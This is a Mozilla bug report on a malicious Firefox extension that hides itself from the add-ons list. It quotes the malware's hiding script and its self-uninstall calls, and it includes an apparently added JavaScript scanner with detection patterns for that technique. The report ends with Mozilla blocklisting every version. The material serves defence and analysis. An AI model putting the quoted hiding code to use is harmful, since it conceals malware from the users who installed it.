Closed
Bug 1240561
Opened 9 years ago
Closed 9 years ago
malware extension hiding itself from extension list
Categories
(Toolkit :: Blocklist Policy Requests, defect)
RESOLVED
FIXED
People
(Reporter: mdurakovich, Assigned: jorgev)
Details
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Build ID: 20160105164030
Steps to reproduce:
Installed a malware extension "jid1-W4CLFIRExukJIFW@jetpack_1.xpi" with MD5 = D3899A6EC58E914E3A92D027358BF48B, which uses a self-hiding technique to avoid appearing in the user's list of extensions, among other bad behaviors.
This extension is available for download from VirusTotal.
Actual results:
The extension hides itself from the user's extension list upon installation.
Expected results:
Extensions should not be able to hide themselves.
Further Details
------------------------------------
As I realize this is a known issue that is not easily rectified, this bug is submitted more for informational purposes, in the spirit of bug 1209452 comment #6: https://bugzilla.mozilla.org/show_bug.cgi?id=1209452#c6
Within this bad extension, the following code is responsible for hiding the extension from the about:addons list:

    addtabobserver(function (tab, action) {
        if (action == 'ready' && tab.url=='about:addons') {
            var worker = tab.attach({
                contentScript: 'unsafeWindow.removeit=function(){var listx=unsafeWindow.document.getElementById("addon-list");for (let item of listx.childNodes) {if(item[\'value\']==\'jid1-W4CLFIRExukJIFW@jetpack\'){listx.removeChild(item);};};};unsafeWindow.removeit();setInterval(function(){unsafeWindow.removeit();},100);'
            });
        }
    });

The addon also tries to uninstall previous versions of itself which it enumerates as follows:
uninstallExtension("jid1-W3CLwrPxukJIFQ@jetpack");
uninstallExtension("jid1-W3CLwrPxukJIFJ@jetpack");
uninstallExtension("jid1-W3CLwrPxukJIFK@jetpack");
uninstallExtension("jid1-W3CLwrPxukJIFW@jetpack");
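
For triaging similar samples, the indicators visible in the snippet above can be turned into a static check over an unpacked add-on's scripts. This is an added example, not part of the original report or of Mozilla's tooling; the rule names, verdict labels and the condensed SAMPLE source are assumptions constructed from the code quoted in the description.

```javascript
// Added example: static triage for the self-hiding pattern described in this report.
// Rule names, verdict labels and the SAMPLE sources are assumptions for illustration.
const RULES = [
  ['targets-addons-page', /about:addons/],
  ['touches-addon-list', /getElementById\(\s*\\?["']addon-list\\?["']\s*\)/],
  ['removes-list-node', /\.removeChild\s*\(/],
  ['repeats-on-timer', /setInterval\s*\(/],
  ['uninstalls-addons', /uninstallExtension\s*\(/],
];
const HIDING = ['targets-addons-page', 'touches-addon-list', 'removes-list-node'];

// Scan one source file; ownId is the add-on ID taken from the package manifest.
function scanSource(file, text, ownId) {
  const hits = RULES.filter(([, re]) => re.test(text)).map(([id]) => id);
  const ids = [...new Set(text.match(/[\w.-]+@jetpack/g) || [])];
  const verdict = HIDING.every((id) => hits.includes(id)) ? 'self-hiding'
    : hits.length ? 'review' : 'clean';
  return {
    file, verdict, hits,
    referencesOwnId: ids.includes(ownId),
    otherIds: ids.filter((id) => id !== ownId), // candidates for the same block entry
  };
}

// Scan every file of an unpacked add-on and keep the findings worth a human look.
function scanAddon(sources, ownId) {
  return Object.entries(sources)
    .map(([file, text]) => scanSource(file, text, ownId))
    .filter((r) => r.verdict !== 'clean');
}

// Constructed sample: a condensed form of the reported code plus a benign file.
const SAMPLE = {
  'main.js': [
    "addtabobserver(function (tab, action) {",
    "  if (action == 'ready' && tab.url == 'about:addons') {",
    "    tab.attach({ contentScript: 'var l=document.getElementById(\"addon-list\");' +",
    "      'setInterval(function(){for (let i of l.childNodes)' +",
    "      '{if(i.value==\"jid1-W4CLFIRExukJIFW@jetpack\")l.removeChild(i);}},100);' });",
    "  }",
    "});",
    'uninstallExtension("jid1-W3CLwrPxukJIFQ@jetpack");',
  ].join('\n'),
  'options.js': "document.getElementById('save').addEventListener('click', save);",
};

console.log(JSON.stringify(scanAddon(SAMPLE, 'jid1-W4CLFIRExukJIFW@jetpack'), null, 2));
```

The `otherIds` field collects sibling IDs referenced by the sample, which is the list a reviewer would check when deciding whether earlier versions need the same block.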
Reporter
Comment 1•9 years ago
Our organization may be releasing details publicly about this issue. We would like to coordinate a disclosure plan, if so, and would welcome your input and comments for inclusion in that release, should it happen.
Comment 2•9 years ago
Jorge/Andreas, can you move this and blocklist (I guess?)? Thanks.
Flags: needinfo?(jorge)
Flags: needinfo?(awagner)
Comment 3•9 years ago
From what I can see, none of the IDs have been signed.
Leaving this to Jorge to decide what to do.
Flags: needinfo?(awagner)
Assignee
Comment 4•9 years ago
I'll look into the IDs and block them if necessary. As for disclosure, I'm adding Dan Veditz from our Security Team for input.
Assignee: nobody → jorge
Group: firefox-core-security → client-services-security
Status: UNCONFIRMED → NEW
Component: Untriaged → Blocklisting
Ever confirmed: true
Flags: needinfo?(jorge) → needinfo?(dveditz)
Product: Firefox → addons.mozilla.org
Version: 43 Branch → unspecified
Assignee
Comment 5•9 years ago
The extensions have been blocked: https://addons.mozilla.org/en-US/firefox/blocked/i1078
Status: NEW → RESOLVED
Closed: 9 years ago
Resolution: --- → FIXED
Reporter
Comment 6•9 years ago
Question - did you block all of the previous versions as well, or just the latest one?
Assignee
Comment 7•9 years ago
All versions are blocked.
Comment 8•9 years ago
(In reply to Mike Durakovich from comment #1)
> Our organization may be releasing details publicly about this issue. We
> would like to coordinate a disclosure plan, if so, and would welcome your
> input and comments for inclusion in that release, should it happen.
Our own disclosure for this kind of thing is pretty much the notice infected users get when the blocklist is updated and disables the bad add-ons. The notice will contain the link in comment 5, which links to this bug. We normally un-hide the bug at this point to be transparent about why we are taking things away from people (malware names like "Adobe Flash Player" are chosen to fool people, and they work!).
If the add-on were installed from the web through some Firefox flaw we'd certainly publish something about _that_, but not individual instances of "you were scammed into installing malicious software". If there was something more you need about disclosure we should move the conversation to the security (at) mozilla.org alias because it gets off-topic for the bug.
Group: client-services-security
Flags: needinfo?(dveditz)
Reporter
Comment 9•9 years ago
Nope, that works for us. Thanks!
Updated•9 years ago
Product: addons.mozilla.org → Toolkit